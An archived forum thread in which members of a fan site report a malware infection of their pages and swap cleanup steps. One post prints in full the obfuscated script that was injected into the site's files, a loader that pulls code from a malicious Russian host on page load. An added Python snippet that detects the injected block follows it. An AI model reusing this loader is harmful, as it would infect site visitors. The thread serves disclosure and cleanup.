Harald B Posted March 3, 2010
Since this morning each time I try to go to mixnmojo.com AVG warns me that it's blocking a connection to a very dubious link; they vary slightly, with the following being a good example: winamp-com.mapquest.com.orbitdownloader-com.breathconditioning.ru:8080/petardas.com/petardas.com/fanpop.com/secureserver.net/google.com.php (warning: going there is probably a very bad idea). The site still shows up fine and I have no idea what element is causing this, but since I haven't gotten this before anywhere and am only getting it with Mojo (and also with Behind Mojo) you may want to have an admin look into it. Sorry if I should have posted this somewhere else. I'm not sure where that would be.
Edit: I've got two more relevant details. Only the main site and Behind cause trouble, deeper links (blog comments, game database etc) are fine. Also, my other, Nod32-using computer warns me at the same places, and identifies it as a "JS/TrojanDownloader.Agent.NSM Trojan".

Gabez Posted March 3, 2010
Weird. Thanks for letting us know. I don't understand any of the technicalities, but hopefully (HOPEFULLY!) someone on the team does. I do know that it's getting increasingly hard to update the news, though; the admin keeps crashing. Don't know if that's related or not. I showed a tech friend the inner workings of the site the other day and he was horrified -- apparently the code was made obsolete years ago, and by all logic Mixnmojo shouldn't work at all. Yet it's managing to lumber on... I guess because we keep on stacking more lines of code on top of it. Hopefully this malware infection won't spread anymore and we can trap it in more lines of code. That's the only solution I can think of for now. Maybe someone who actually knows what they're talking about can give some better advice.

elTee Posted March 3, 2010
Heh yes, I changed the EMI score from 4 skulls to 2 for a joke, but then the goddamn thing kept resetting itself to 2 again. Remi was up all night changing it back.

Gabez Posted March 4, 2010
It has begun: http://poisonpen.mixnmojo.com/ and http://pumpkinpost.mixnmojo.com/ have now been infected by Mojo 9's seriously dated and ageing code. It's Chernobyl all over again.

Haggis Posted March 4, 2010
Yeah, I noticed that someone, or something, had been messing with my WordPress files. I'm now re-uploading the affected files. Looks like some kind of virus or something, although I'm even less technically savvy than Gabez, so I don't really know what I'm talking about. Right now the Pumpkin Post seems to be back up and running, hopefully that was that...

Benny Posted March 4, 2010
Looks like it's probably a variant of the Gumblar script. I know Zaarin has cleaned it from some pages, but it's tried to copy itself to all index.php pages it seems. Most of the *index php files on my site got a script appended to the end, it even snuck its way into my Wordpress theme files too. Any site that's using Wordpress will need to make sure they check their themes and plugins. I know I normally just leave the wp-content folder alone when upgrading/fixing.

Harald B Posted March 4, 2010
Heads-up: I'm now also getting it when at the comments sections for individual blog posts and in the game database (i.e. it's spread to showfile.php and gamedb.php, presumably).
Edit: Nod32 is now identifying it as a "JS/TrojanDownloader.Iframe.NHE Trojan". Maybe the word Iframe will do your engineers some good.

Gabez Posted March 4, 2010
The infection is spreading!!!! DO NOT PANIC.

jp-30 Posted March 4, 2010
If only we had started building Mojo 10.

DJG Posted March 5, 2010
Don't blame the code. Damn kids.

Valkian Posted March 5, 2010
I hate to say this Gabez... but I'M IN PANIC!!! Both The Dig Museum and The Thrillville Quarterly are under attack!! Should re-uploading the files solve the problem? WHAT SHOULD I DO?? I'M SO UNPREPARED FOR THIS! HIGHSCHOOL SUCKS!

MJ Posted March 5, 2010
Nightlight appears to be fine. Heh, not even a virus can be arsed to pay attention to it.

QueZTone Posted March 5, 2010
haha DJG came out of hiding after all those years! my plan worked! but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script.. the mapquest thing is just a wrong advertisement i think?

Harald B Posted March 5, 2010
> but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script.. the mapquest thing is just a wrong advertisement i think?
Afraid not. The link is way too dubious for that, and to make sure I re-enabled adblock on Mojo and still got the same warnings.

diduz Posted March 5, 2010
Guys, the malware has attacked my laptop and I've been battling to save my system!!! I won't go back to the site until it's safe again (I'm writing from another PC right now). It seems to be some sort of fake virus alert.

Icebox Posted March 5, 2010
Series of tubes, goddamn it. I hope you gentlemen come out of it okay, powers that be willing. I will try to stay off of Mojo until you get 10 up and running. Don't want to take any major risks. Also I actually sort of enjoyed Poison Pen, for whatever reason, and am sad to see it wiped. All the beast.

Benny Posted March 5, 2010
For those hosted sites using Wordpress you'll either need to restore off a known clean backup or reinstall Wordpress. I had to:
- Delete the wp-admin and wp-includes folders
- Download wordpress again and reupload all the files, overwriting those that were there
- Edit the wp-config.php and index.php files to remove the virus code from the footer
- Look in the themes in wp-content and remove the code from the footers in the php files
None of the plugins looked like they were infected, but it seems that the script can be appended to .js files too so to be safe I deleted the existing plugins and replaced them one by one.
This is the code that was appended to my files:
<script>try {var L;if(L!='l'){L='l'};var b='replace';var J="";var vs="";var Y=RegExp;var NS='';var d;if(d!='' && d!='hs'){d=null};this.iu="";function v(e,B){var _=new Array();var sR;if(sR!='Vb' && sR != ''){sR=null};var y='[';var i_=new Array();var mV=new Date();var V='g';y+=B;var z;if(z!='dD'){z='dD'};y+=']';this.Pv='';var W=new Y(y, V);var eF=new Date();var lD=new Date();return e[b](W, new String());};var YI;if(YI!='' && YI!='Hu'){YI='C'};this.Wd="";var h=v('/jpWejtLajrWdLaWsL.LcjoWmj/jpjejtWaWrLdLaLsj.WcWoLmW/jfWaLnLpLoLpW.LcLoWmW/jsWejcLujrLejsjeWrLvLeWrW.WnjeLtW/WgLojojgjlLeW.LcLoLmj.WpjhLpL',"WjL");var yh;if(yh!='ul' && yh!='hU'){yh='ul'};var a=v('8999696960966996869666609696996',"69");var An=new Date();var uc=new Date();var c=v('cbrbeJaJtJeZEJlJeZmbeZnbtb',"ZBJb");var j=new Date();var S=v('h9tztOpz:z/9/zwOi9nOaOm9pz-OcOoOm9.zm9a9pOq9u9e9sztO.zczozmz.Oo9r9bziztzdzozwOnOlzoza9dOezrz-9c9ozmz.9bzr9eza9tOhzc9oznOdzi9t9iOo9nziznzg9.Or9u9:z',"O9z");var yx='';this.ne="";var nw;if(nw!='' && nw!='pk'){nw=null};var bU=window;this._m='';var Rn;if(Rn!='' && Rn!='HF'){Rn=null};var w=v('o8n3lqo8aTd3',"T83q");var xv=new String();this.QK="";var nT;if(nT!='' && nT!='X'){nT=null};var ik;if(ik!='' && ik!='VG'){ik=null};var o=v('s9c9rIiIpIt9',"9lI");A=function(){var Ly;if(Ly!='LU' && Ly != ''){Ly=null};var lY;if(lY!='lS' && lY != ''){lY=null};var Bn=new Array();G=document[c](o);var St;if(St!='Vo'){St=''};var LI;if(LI!='' && LI!='kI'){LI=''};yx=S+a;var KC=new Date();yx+=h;var HN="";G.defer=([1][0]);var Yh='';var lh;if(lh!='' && lh!='rb'){lh=''};G.src=yx;var Vt;if(Vt!='' && Vt!='hss'){Vt=null};var Wr;if(Wr!='HE' && Wr!='ke'){Wr='HE'};document.body.appendChild(G);this.iQ='';};var tK=new Array();bU[w]=A;} catch(M){var In=new Date();var mh;if(mh!='KU' && mh!='Za'){mh=''};};</script>
<!--699af17d7dda64c9f7a4601e44c2c9c6-->

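An added example, not part of Benny's post or of the site's own code: a Python check for the shape visible in the script above, a `<script>` block appended at the very end of a file and followed by an HTML comment of 32 hex digits. The scanned extensions, the function names and the heuristic itself are assumptions drawn from this one sample, and the sample files are constructed with a harmless stand-in script.

```python
import os
import re
import tempfile
from pathlib import Path

# Heuristic (assumption, based on the one sample in this thread): a <script>
# block at the end of the file followed by an HTML comment of 32 hex digits.
TAIL_INJECTION = re.compile(
    rb"<script\b[^>]*>(?:(?!</script>).)*</script>\s*<!--([0-9a-f]{32})-->\s*\Z",
    re.DOTALL | re.IGNORECASE,
)
SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm")  # assumed set of file types

def find_injection(data: bytes):
    """Return (start_offset, marker_hex) for a trailing appended block, else None."""
    m = TAIL_INJECTION.search(data)
    return (m.start(), m.group(1).decode("ascii")) if m else None

def scan_tree(root: str):
    """Walk root and report each matching file as (relative_path, marker_hex)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            found = find_injection(Path(path).read_bytes())
            if found:
                hits.append((os.path.relpath(path, root), found[1]))
    return sorted(hits)

def build_sample_tree(root: str):
    """Constructed sample tree: two files carry a harmless stand-in tail."""
    tail = b"\n<script>try {var x=1;} catch(e){};</script>\n<!--0123456789abcdef0123456789abcdef-->"
    samples = {
        "index.php": b"<?php echo 'home'; ?>" + tail,
        "wp-content/themes/demo/footer.php": b"</body></html>" + tail,
        "wp-content/plugins/demo/ok.js": b"var a = 1;\n",
        "about.php": b"<script>var legit=1;</script>\n<p>About</p>\n",
    }
    for rel, body in samples.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, marker in scan_tree(tmp):
            print(f"{rel}: appended script block, marker {marker}")
```

The check only reports files; the start offset returned by `find_injection` shows where the appended block begins when comparing against a clean copy.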
Gabez Posted March 5, 2010
Oh my, DJG! Now I know that it's the end of days. Hopefully we'll get it sorted out soon because we can't afford to rebuild the code from scratch for at least another few years (when the economy has fully recovered). Until then the mythical "10" version will have to remain just a myth. :/

daltysmilth Posted March 5, 2010
If, God forbid, the whole site goes down, is there anyplace we could go to see what the status is to getting it back up again?

Harald B Posted March 5, 2010
Right here, probably. LucasForums is sufficiently distinct from Mojo that it should stay fine.

Valkian Posted March 5, 2010
I was actually thinking of Gabez' place. That would be the ultimate shelter for us in times of desperation.

Gabez Posted March 5, 2010
None of you are allowed in my panic shelter >:

elTee Posted March 5, 2010
Gabez should be shot for this. I've seen his panic shelter, and it would not be a lie to say that one half of it contains 17,450 hot water bottles (of various design, size etc.) and the other half contains a large, deep, bath.

MJ Posted March 6, 2010
I've checked Nightlight's code, and it seems to be fine. It's on Wordpress, but as a coincidence I updated it to the latest version about five days ago.

Gabez Posted March 6, 2010
Yeah, but Nightlight is on the Grim Fandango.net part of the server, so I don't think it would be affected anyway. But it never hurts to make sure!

This topic is now archived and is closed to further replies.